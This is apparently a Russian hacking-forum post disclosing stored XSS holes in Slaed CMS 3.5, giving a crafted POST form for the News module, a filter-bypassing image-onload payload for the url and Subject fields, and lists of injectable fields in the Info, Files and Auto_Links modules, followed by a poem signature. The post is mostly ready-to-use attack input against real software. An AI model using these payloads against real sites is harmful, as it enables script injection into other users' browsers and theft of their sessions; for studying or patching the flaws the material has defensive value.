Ещё пассивки в POST-запросах в
Slaed CMS 3.5:
Код:
<form method="POST" action="http://site/index.php?name=News&op=add">
postname: <input type="text" name="postname"/><br />
<input type="submit" />
</form>
В поле
url прописать:
Код:
"><image src=uploads/avatars/00.gif onload=alert(/XSS/)>
Поле
src должно указывать на существующий файл. (Варианты с просто
<script> и
<body onload=""> не прокатят )
Так-же уязвимо поле
Subject.
--------------------------------------
Тут:
Код:
http://site/index.php?name=Info
уязвимо поле
url. Также POST запрос:
Код:
"><image src=uploads/avatars/00.gif onload=alert(/XSS/)>
---------------------------------------
Код:
http://site/index.php?name=Files&op=add
уязвимы поля: author, authormail, authorurl, title, cid
-------------------------------------
Код:
http://site/index.php?name=Auto_Links&op=add
уязвимы поля: a_sitelink, a_sitename, a_adminemail
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог:
http://qwazar.ru/.